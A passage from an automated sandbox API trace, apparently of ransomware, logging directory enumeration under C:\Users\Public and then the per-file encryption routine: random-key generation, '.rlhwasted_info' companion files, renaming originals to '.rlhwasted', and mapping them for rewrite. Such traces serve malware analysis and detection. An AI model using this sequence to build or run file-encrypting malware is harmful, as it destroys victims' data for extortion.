ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.137] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.137] lstrlenW (lpString="desktop.ini") returned 11 [0185.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0185.137] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.137] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.137] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.137] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.137] lstrlenW (lpString="desktop.ini") returned 11 [0185.137] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0185.137] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0185.137] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0185.137] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0185.137] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0185.137] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0185.138] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.138] lstrlenW (lpString="Videos") returned 6 [0185.138] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0185.138] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0185.138] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.138] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.138] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.138] lstrlenW (lpString="desktop.ini") returned 11 [0185.138] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0185.138] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.138] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.138] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.138] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.138] lstrlenW (lpString="desktop.ini") returned 11 [0185.138] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0185.139] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0185.139] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0185.139] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0185.139] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0185.139] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0185.139] FindClose (in: hFindFile=0x6ebce0 | out: hFindFile=0x6ebce0) returned 1 [0185.139] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee5c8 | out: hHeap=0x6b0000) returned 1 [0185.139] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5c003f, cFileName="Public", cAlternateFileName="")) returned 0 [0185.139] FindClose (in: hFindFile=0x6ebca0 | out: hFindFile=0x6ebca0) returned 1 [0185.139] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecc60 | out: hHeap=0x6b0000) returned 1 [0185.139] FindNextFileW (in: hFindFile=0x6d47d8, lpFindFileData=0x6d4580 | out: lpFindFileData=0x6d4580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x75544d62, cFileName="Windows", cAlternateFileName="")) returned 1 [0185.139] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.139] lstrlenW (lpString="Windows") returned 7 [0185.139] FindClose (in: hFindFile=0x6d47d8 | out: hFindFile=0x6d47d8) returned 1 [0185.139] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0185.139] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0185.139] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d6178 | out: hHeap=0x6b0000) returned 1 [0185.139] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0185.140] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.140] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.140] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0185.140] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6d4580 [0185.140] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.140] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.140] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0185.141] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.141] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.141] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.141] WriteFile (in: hFile=0x104, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.142] SetEndOfFile (hFile=0x104) returned 1 [0185.142] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.143] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.143] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.143] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.rlhwasted")) returned 1 [0185.143] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0185.144] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0185.144] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x10676 [0185.144] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10676) returned 0xb00000 [0185.144] CloseHandle (hObject=0x108) returned 1 [0185.149] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0185.149] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0185.150] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6eb868 | out: pbBuffer=0x6eb868) returned 1 [0185.150] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0185.150] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0185.151] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.151] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0185.159] SetEndOfFile (hFile=0x104) returned 1 [0185.161] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ea568 | out: hHeap=0x6b0000) returned 1 [0185.161] CloseHandle (hObject=0x104) returned 1 [0185.164] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0185.164] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec978 | out: hHeap=0x6b0000) returned 1 [0185.164] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0185.165] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.165] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0185.165] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0185.165] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6d4580 [0185.165] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.166] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ea568 [0185.166] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0185.166] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ea568 | out: pbBuffer=0x6ea568) returned 1 [0185.166] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0185.166] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.167] WriteFile (in: hFile=0x104, lpBuffer=0x6ea568*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ea568*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.168] SetEndOfFile (hFile=0x104) returned 1 [0185.168] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.168] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ea568 | out: hHeap=0x6b0000) returned 1 [0185.168] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0185.169] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0185.169] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0185.169] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x2488 [0185.169] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2488) returned 0x6a0000 [0185.169] CloseHandle (hObject=0x10c) returned 1 [0185.189] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0185.190] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.190] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.190] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0185.191] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.191] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.201] SetEndOfFile (hFile=0x104) returned 1 [0185.204] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.204] CloseHandle (hObject=0x104) returned 1 [0185.209] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0185.209] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eca70 | out: hHeap=0x6b0000) returned 1 [0185.209] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0185.210] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.210] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.210] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0185.210] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c4) returned 0x6d5420 [0185.210] lstrcpyW (in: lpString1=0x6d54da, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.210] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.211] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0185.211] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.211] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.211] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.213] WriteFile (in: hFile=0x104, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.214] SetEndOfFile (hFile=0x104) returned 1 [0185.214] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.214] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.214] lstrcpyW (in: lpString1=0x6d54da, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.rlhwasted")) returned 1 [0185.246] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0185.246] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0185.246] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x545 [0185.246] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x545) returned 0x6a0000 [0185.246] CloseHandle (hObject=0x10c) returned 1 [0185.260] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0185.261] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.261] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.261] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0185.262] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, 